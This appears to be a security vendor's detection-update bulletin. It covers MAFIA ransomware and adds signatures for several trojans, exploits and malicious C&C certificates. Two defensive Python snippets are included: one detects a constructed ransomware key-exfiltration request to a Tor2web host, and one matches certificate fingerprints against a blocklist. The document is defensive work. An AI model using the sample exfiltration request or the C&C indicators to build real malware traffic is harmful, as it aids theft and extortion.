    MAFIA ransomware recently emerged in the wild targeting users in Korea. It gets its name from the extension it appends to its victims' files. It uses OpenSSL to perform the file encryption, which is carried out with AES-256-CBC, and encrypts every file whose extension appears in a list of more than 300 extensions. For C&C it uses a Tor2web proxy at onion[.]pet.

    After encryption, the malware attempts to send the encryption key and initialization vector to the C&C server using an HTTP GET request. It also creates a file named 'Information' that contains some Korean text and two strings to be used as identifiers in the ransom payment and decryption processes.
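    The two observable features of that key hand-off are the Tor2web gateway in the Host header and a GET whose query string carries values the size of an AES-256 key and a CBC IV. The following is an added example, not AlienVault's signature logic: it parses constructed HTTP requests, flags the onion[.]pet gateway named above, and looks for 64- and 32-character hex query values. The hex encoding and the parameter names are assumptions for illustration; the report does not state how the key and IV are encoded, so treat the size check as a heuristic and the gateway match as the stronger indicator.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Tor2web gateway domain named in the MAFIA write-up. Other gateways would be
# added here; only onion.pet is taken from the report.
TOR2WEB_SUFFIXES = (".onion.pet",)

# Assumed parameter sizes: a 32-byte AES-256 key and a 16-byte CBC IV, sent as
# hex. The report does not state the encoding, so this is a heuristic.
KEY_HEX = re.compile(r"^[0-9a-fA-F]{64}$")
IV_HEX = re.compile(r"^[0-9a-fA-F]{32}$")

# Constructed HTTP requests (not captured traffic); the hostname is invented.
SAMPLE_REQUESTS = [
    "GET /gate.php?id=A1B2C3&key=" + "ab" * 32 + "&iv=" + "cd" * 16 + " HTTP/1.1\r\n"
    "Host: exampleonionaddress.onion.pet\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    "GET /search?q=" + "ef" * 32 + " HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
]


def parse_request(raw):
    """Split an HTTP/1.x request into method, target and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def inspect(raw):
    """Return a list of finding labels for one request; empty means clean."""
    method, target, headers = parse_request(raw)
    host = headers.get("host", "").lower()
    findings = []
    if host.endswith(TOR2WEB_SUFFIXES):
        findings.append("tor2web_gateway")
    if method == "GET":
        values = [v for vs in parse_qs(urlsplit(target).query).values() for v in vs]
        if any(KEY_HEX.match(v) for v in values):
            findings.append("aes256_key_sized_param")
        if any(IV_HEX.match(v) for v in values):
            findings.append("iv_sized_param")
    # Only the combination is worth an alert: a key-sized hex value alone is
    # a common false positive (hashes, session tokens).
    if "tor2web_gateway" in findings and "aes256_key_sized_param" in findings:
        findings.append("ransomware_key_exfil")
    return findings


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(raw.split("\r\n")[0], "->", inspect(raw) or "clean")
```

    The third sample request carries a 64-hex value to an ordinary host and only gets the weak size finding, which is the point of requiring both indicators before alerting. If such a request is captured in the clear, the key material in it is also what a responder would need to recover the files, so the alert is worth preserving the full request for, not just the headers.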

    We've added NIDS signatures and the following correlation rule to detect MAFIA activity: 

    • System Compromise, Malware Infection, Ransomware

    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5b70534f319dba7ddcdaab8f

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, JEUSD
    • System Compromise, Trojan infection, MSIL/Haunted Miner
    • System Compromise, Trojan infection, MSIL/Simple Miner
    • System Compromise, Trojan infection, MSIL/Songhan
    • System Compromise, Trojan infection, Win32/Donloz

    Added Detection Technique – Malware SSL Certificates

    We've added new IDS signatures to include the list of certificates identified by Abuse.ch as associated with malware or botnet activity. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

    • System Compromise, C&C Communication, Haunted Miner Malicious SSL Cert
    • System Compromise, C&C Communication, JEUSD SSL
    • System Compromise, C&C Communication, PoshAdvisor SSL/TLS

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Adobe Reader Untrusted Pointer Dereference (CVE-2018-12799)
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Advantech Login SQL Injection Attempt (CVE-2017-16716)
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Flash Player Out-of-bounds Read
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Windows Remote Assistance XXE Exploit Inbound (CVE-2018-0878)
    • System Compromise, Mobile trojan infection, Android.Trojan.InfoStealer.MT

    Updated Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, Arkei Stealer
    • System Compromise, Trojan infection, Bancos Variant.DZO
    • System Compromise, Trojan infection, DDoS Smoke Loader
    • System Compromise, Trojan infection, Dupzom
    • System Compromise, Trojan infection, MICROPSIA
    • System Compromise, Trojan infection, Pegasus

    Updated Detection Technique – Malware SSL Certificates

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch as associated with malware or botnet activity. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

    • System Compromise, C&C Communication, Cobalt Group SSL
    • System Compromise, C&C Communication, CobaltStrike SSL activity
    • System Compromise, C&C Communication, Observed Malicious SSL Cert (MalDoc DL) SSL activity
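    The Abuse.ch SSL blocklist behind these rules (here and in the earlier "Malware SSL Certificates" entries above) is a list of SHA1 fingerprints of certificates seen on malware C&C servers, published as a CSV of listing date, SHA1 and listing reason. The following is an added example, not the AlienVault or Abuse.ch code: it parses a constructed CSV in that column layout, fingerprints the DER bytes of each certificate in a presented chain, and reports the ones that are listed. The two DER blobs are stand-in byte strings, not real certificates, and the listing entries are invented.

```python
import csv
import hashlib

# Stand-in DER blobs. They are NOT certificates, just bytes whose SHA1 plays
# the role of a certificate fingerprint; on real traffic you would hash the
# full DER encoding of each certificate in the server's Certificate message.
STANDIN_BAD_CERT = b"\x30\x82\x00\x10-standin-listed-cert-bytes"
STANDIN_OTHER_CERT = b"\x30\x82\x00\x10-standin-unlisted-cert-bytes"


def fingerprint(der):
    """SHA1 of the DER bytes, lower-case hex, the form SSLBL publishes."""
    return hashlib.sha1(der).hexdigest()


# Constructed file in the column layout of SSLBL's sslblacklist.csv
# (Listingdate,SHA1,Listingreason) with '#' comment lines. The entries are
# invented; the first fingerprint is that of STANDIN_BAD_CERT above.
SAMPLE_SSLBL_CSV = (
    "# SSL certificate blocklist (constructed sample, not the real feed)\n"
    "# Listingdate,SHA1,Listingreason\n"
    f"2018-08-14 09:51:12,{fingerprint(STANDIN_BAD_CERT)},CobaltStrike C&C\n"
    "2018-08-10 11:03:45,0000000000000000000000000000000000000000,JEUSD C&C\n"
)


def load_sslbl(text):
    """Parse SSLBL CSV text into {sha1: (listing_date, reason)}."""
    rows = (line for line in text.splitlines() if line and not line.startswith("#"))
    blocklist = {}
    for date, sha1, reason in csv.reader(rows):
        blocklist[sha1.strip().lower()] = (date, reason)
    return blocklist


def match_chain(der_chain, blocklist):
    """Return one finding per listed certificate in a presented chain."""
    hits = []
    for position, der in enumerate(der_chain):
        fp = fingerprint(der)
        if fp in blocklist:
            date, reason = blocklist[fp]
            hits.append({"position": position, "sha1": fp, "reason": reason, "listed": date})
    return hits


if __name__ == "__main__":
    bl = load_sslbl(SAMPLE_SSLBL_CSV)
    for hit in match_chain([STANDIN_OTHER_CERT, STANDIN_BAD_CERT], bl):
        print(f"cert #{hit['position']} {hit['sha1']} listed {hit['listed']}: {hit['reason']}")
```

    Two caveats when relying on this class of rule: the fingerprint is over the exact DER bytes, so an operator who reissues the certificate drops off the list until Abuse.ch sees the new one, and the Certificate message is only visible on the wire for TLS 1.2 and earlier; under TLS 1.3 it is encrypted, so a network sensor cannot match the fingerprint at all and needs a different indicator (JA3, SNI, or destination reputation).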

    Updated Correlation Rules

    We've added NIDS signatures and updated the following correlation rules as a result of additional recent malicious activity:

    • Delivery & Attack, Malicious website, Phishing activity
    • Exploitation & Installation, Malicious website - Exploit Kit, KaiXin
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Mobile trojan infection, Hqwar Dropper
    • System Compromise, Suspicious Behaviour, Suspicious user-agent detected
    • System Compromise, WebServer Attack, JS/BrushaLoader CnC